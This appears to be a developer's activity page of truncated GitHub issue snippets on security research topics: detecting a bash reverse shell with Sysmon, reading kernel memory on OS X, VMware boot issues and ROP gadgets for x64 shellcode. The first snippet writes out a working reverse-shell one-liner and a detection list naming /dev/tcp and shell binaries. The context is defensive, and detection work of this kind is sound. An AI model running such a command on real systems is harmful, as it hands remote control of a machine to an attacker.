Vincent Van Mieghem
#### Description I'm trying to detect the following basic `bash` reverse shell `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`. I have the following Sysmon rules enabled: ```xml /bin/bash /bin/dash /bin/sh /dev/tcp /dev/udp...
Fixes the `/dev/kmem` bad address bug in OS X 10.10 by opening `kmem` in `READ ONLY` mode. Thanks to @msedit.
I try to run bruteforcesysent on OSX 10.10.5 in VMware Fusion 8. I have enabled both bootargs `sudo nvram boot-args="kmem=1"` and ``` Kernel Flags kmem=1 ``` in `/Library/Preferences/SystemConfiguration/com.apple.Boot.plist`. When I...
I performed an install of alpha_2016-12-30_1 using VMware Fusion 8.5 on macOS 10.12.2 on an [i5-6267U](http://ark.intel.com/products/91166/Intel-Core-i5-6267U-Processor-4M-Cache-up-to-3_30-GHz). With Intel VT-x enabled on first boot I experience the following:  If I...
I'm trying to get this to work for x64 shellcode. The gadget `pop r64; ret` has the same opcodes as `pop r32; ret` (afaik, could be mistaken). However, if I...
I'm trying to get the tech-radar running locally without the Firebase functions (not planning to use them). I've loaded up a Contentful instance with the example `contentful-export-2022-04-18.json` and populated the...